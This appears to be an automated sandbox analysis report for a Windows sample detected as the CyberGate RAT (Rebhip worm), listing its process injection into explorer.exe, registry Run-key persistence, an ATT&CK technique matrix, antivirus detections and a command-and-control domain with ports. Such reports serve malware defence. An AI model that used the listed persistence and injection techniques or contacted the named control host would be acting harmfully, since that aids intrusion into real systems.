            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24044968 keybd_event,keybd_event,20_2_24044968
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2401544E mouse_event,20_2_2401544E
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe
            Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe
            Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe'
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: Shell_TrayWndSV
            Source: explorer.exe, 00000014.00000002.632181985.0000000006576000.00000004.00000001.sdmp Binary or memory string: Program Manager
            Source: TEXTURAFIVEM.exe, explorer.exe, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.610917551.0000000003F00000.00000002.00000001.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.612946669.0000000003ED0000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.621976402.0000000003810000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000002.611367591.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.613041242.00000000039A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.611307040.0000000003FD0000.00000002.00000001.sdmp, explorer.exe, 00000016.00000002.610917551.0000000003F00000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.612946669.0000000003ED0000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.621976402.0000000003810000.00000002.00000001.sdmp Binary or memory string: Progman
            Source: explorer.exe, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: ProgMan
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: deskicoblockProgMan
            Source: explorer.exe, 00000014.00000002.632181985.0000000006576000.00000004.00000001.sdmp Binary or memory string: Program Manager+
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: ProgManS
            Source: dqH3t8JU1x.exe, 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp Binary or memory string: explorer.exeexplorer.exeshell_traywndopenU
            Source: explorer.exe, 00000002.00000002.611367591.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.613041242.00000000039A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.611307040.0000000003FD0000.00000002.00000001.sdmp, explorer.exe, 00000016.00000002.610917551.0000000003F00000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.612946669.0000000003ED0000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.621976402.0000000003810000.00000002.00000001.sdmp Binary or memory string: &Program Manager
            Source: explorer.exe, 00000002.00000002.611367591.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.613041242.00000000039A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.611307040.0000000003FD0000.00000002.00000001.sdmp, explorer.exe, 00000016.00000002.610917551.0000000003F00000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.612946669.0000000003ED0000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.621976402.0000000003810000.00000002.00000001.sdmp Binary or memory string: Progmanlock
            Source: TEXTURAFIVEM.exe, 00000004.00000002.517664682.00000000007AA000.00000004.00000020.sdmp Binary or memory string: shell_traywndsole
            Source: explorer.exe, 00000014.00000002.631493178.00000000064B1000.00000004.00000001.sdmp Binary or memory string: Program Manageret
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: Shell_TrayWndTrayNotifyWndSysPagerS
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: 4shell_traywnd
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: Shell_TrayWndTrayNotifyWndSysPagerjh
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: btnstartblockButtonShell_TrayWnd
            Source: explorer.exe, 00000014.00000002.631493178.00000000064B1000.00000004.00000001.sdmp Binary or memory string: Program ManageretI
            Source: dqH3t8JU1x.exe, 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: Shell_TrayWndU
            Source: dqH3t8JU1x.exe, 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp Binary or memory string: _PERSISTShell_TrayWndexplorer.exeU
            Source: explorer.exe, 00000014.00000002.632181985.0000000006576000.00000004.00000001.sdmp Binary or memory string: Program Manager{
            Source: TEXTURAFIVEM.exe, explorer.exe, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: shell_traywnd
            Source: C:\Windows\SysWOW64\explorer.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 20_2_240147A8
            Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoA, 20_2_24018CD0
            Source: C:\Windows\SysWOW64\explorer.exe Code function: GetKeyboardLayoutNameA,GetLocaleInfoA,GetLocaleInfoA, 20_2_24018DE0
            Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoA, 20_2_24018F80
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24016910 GetLocalTime,20_2_24016910
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040555C GetUserNameA,GetUserNameA,1_2_0040555C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040822C RasEnumEntriesA,GetVersionExA,SHGetSpecialFolderPathA,SHGetSpecialFolderPathA,RasGetEntryDialParamsA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,1_2_0040822C

            Stealing of Sensitive Information:

Yara detected CyberGate RAT
Source: Yara match | File source: 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: TEXTURAFIVEM.exe PID: 5432, type: MEMORY
Source: Yara match | File source: Process Memory Space: TEXTURAFIVEM.exe PID: 4024, type: MEMORY
Source: Yara match | File source: Process Memory Space: TEXTURAFIVEM.exe PID: 6984, type: MEMORY
Source: Yara match | File source: Process Memory Space: dqH3t8JU1x.exe PID: 6776, type: MEMORY
Source: Yara match | File source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Replication Through Removable Media1Native API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Input Capture131System Time Discovery1Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsService Execution12Windows Service12Access Token Manipulation1Obfuscated Files or Information21LSASS MemoryPeripheral Device Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Registry Run Keys / Startup Folder21Windows Service12Software Packing11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesInput Capture131Automated ExfiltrationApplication Layer Protocol21Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Process Injection722Masquerading221NTDSSystem Service Discovery1Distributed Component Object ModelClipboard Data2Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder21Virtualization/Sandbox Evasion151LSA SecretsFile and Directory Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsSystem Information Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection722DCSyncQuery Registry1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSecurity Software Discovery341Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowProcess Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingVirtualization/Sandbox Evasion151Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureApplication Window Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
            Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingSystem Owner/User Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
            Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskMasquerade Task or ServiceGUI Input CaptureRemote System Discovery1Exploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

            Behavior Graph

Behavior Graph ID: 388215 | Sample: dqH3t8JU1x.exe | Startdate: 15/04/2021 | Architecture: WINDOWS | Score: 100

Contacted domain: eduzao.ddns.net
Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 7 other signatures

Process tree recovered from the graph (node numbers as in the graph):
dqH3t8JU1x.exe (11), started
  dropped: C:\Windows\install\TEXTURAFIVEM.exe, PE32
  dropped: C:\...\TEXTURAFIVEM.exe:Zone.Identifier, ASCII
  signatures: Creates an undocumented autostart registry key; Contain functionality to detect virtual machines; Contains functionality to inject threads in other processes; 7 other signatures
  explorer.exe (15), injected
    TEXTURAFIVEM.exe (19), started
      signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
      explorer.exe (28), started
        signatures: Contains functionality to inject threads in other processes; Drops executables to the windows directory (C:\Windows) and starts them; Contains functionality to inject code into remote processes
        TEXTURAFIVEM.exe (35), started
          WerFault.exe (41), started
    TEXTURAFIVEM.exe (22), started
      signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Allocates memory in foreign processes
      explorer.exe (31), started
        WerFault.exe (37), started
    TEXTURAFIVEM.exe (24), started
      signatures: Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
      explorer.exe (33), started
        WerFault.exe (39), started
  explorer.exe (17), started
    WerFault.exe (26), started

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label
dqH3t8JU1x.exe | 90% | Virustotal |
dqH3t8JU1x.exe | 100% | ReversingLabs | Win32.Worm.Rebhip
dqH3t8JU1x.exe | 100% | Avira | WORM/Rebhip.V
dqH3t8JU1x.exe | 100% | Joe Sandbox ML |

            Dropped Files

Source | Detection | Scanner | Label
C:\Windows\install\TEXTURAFIVEM.exe | 100% | Avira | WORM/Rebhip.V
C:\Windows\install\TEXTURAFIVEM.exe | 100% | Joe Sandbox ML |
C:\Windows\install\TEXTURAFIVEM.exe | 100% | ReversingLabs | Win32.Worm.Rebhip

            Unpacked PE Files

Source | Detection | Scanner | Label
25.2.TEXTURAFIVEM.exe.400000.0.unpack | 100% | Avira | WORM/Rebhip.Y
4.2.TEXTURAFIVEM.exe.24010000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.dqH3t8JU1x.exe.400000.0.unpack | 100% | Avira | WORM/Rebhip.Y
5.0.TEXTURAFIVEM.exe.400000.0.unpack | 100% | Avira | WORM/Rebhip.V
20.2.explorer.exe.24010000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.dqH3t8JU1x.exe.24010000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
25.0.TEXTURAFIVEM.exe.400000.0.unpack | 100% | Avira | WORM/Rebhip.V
4.2.TEXTURAFIVEM.exe.400000.0.unpack | 100% | Avira | WORM/Rebhip.Y
9.2.TEXTURAFIVEM.exe.24160000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.dqH3t8JU1x.exe.400000.0.unpack | 100% | Avira | WORM/Rebhip.V
30.2.explorer.exe.24010000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.TEXTURAFIVEM.exe.24080000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.0.TEXTURAFIVEM.exe.400000.0.unpack | 100% | Avira | WORM/Rebhip.V
5.2.TEXTURAFIVEM.exe.400000.0.unpack | 100% | Avira | WORM/Rebhip.Y
5.2.TEXTURAFIVEM.exe.240f0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.2.TEXTURAFIVEM.exe.24010000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.2.TEXTURAFIVEM.exe.400000.0.unpack | 100% | Avira | WORM/Rebhip.Y
5.2.TEXTURAFIVEM.exe.24010000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
22.2.explorer.exe.24010000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
21.2.explorer.exe.24080000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.dqH3t8JU1x.exe.24080000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.0.TEXTURAFIVEM.exe.400000.0.unpack | 100% | Avira | WORM/Rebhip.V

            Domains

Source | Detection | Scanner | Label
eduzao.ddns.net | 0% | Virustotal |

            URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
eduzao.ddns.net:7000 | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
eduzao.ddns.net:4400 | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
eduzao.ddns.net:2200 | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
eduzao.ddns.net:2020 | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
eduzao.ddns.net | 181.220.140.205 | true | true | | unknown

            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
eduzao.ddns.net:7000 | true | Avira URL Cloud: safe | unknown
eduzao.ddns.net:4400 | true | Avira URL Cloud: safe | unknown
eduzao.ddns.net:2200 | true | Avira URL Cloud: safe | unknown
eduzao.ddns.net:2020 | true | Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000002.610418959.000000000095C000.00000004.00000020.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                  Contacted IPs

                                  No contacted IP infos

                                  General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 388215
Start date: 15.04.2021
Start time: 23:53:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 0s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: dqH3t8JU1x.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@21/24@4/0
EGA Information: Failed
                                  HDC Information:
                                  • Successful, ratio: 41.7% (good quality ratio 38.7%)
                                  • Quality average: 71.6%
                                  • Quality standard deviation: 32.1%
                                  HCA Information:
                                  • Successful, ratio: 83%
                                  • Number of executed functions: 200
                                  • Number of non-executed functions: 223
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.88.21.125, 92.122.145.220, 2.23.155.232, 2.23.155.186, 104.43.139.144, 13.64.90.137, 40.88.32.150, 52.255.188.83, 20.82.210.154, 23.32.238.177, 23.32.238.234, 8.238.85.254, 8.241.80.126, 8.253.145.105, 8.241.126.121, 8.241.78.126, 51.103.5.186, 52.155.217.156, 20.54.26.129, 184.30.20.56, 104.42.151.234, 168.61.161.212
                                  • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, download.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

Time | Type | Description
23:54:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU C:\Windows\install\TEXTURAFIVEM.exe
23:54:18 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKLM C:\Windows\install\TEXTURAFIVEM.exe
23:54:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HKCU C:\Windows\install\TEXTURAFIVEM.exe
23:55:30 | API Interceptor | 529x Sleep call for process: explorer.exe modified
23:55:51 | API Interceptor | 3x Sleep call for process: WerFault.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

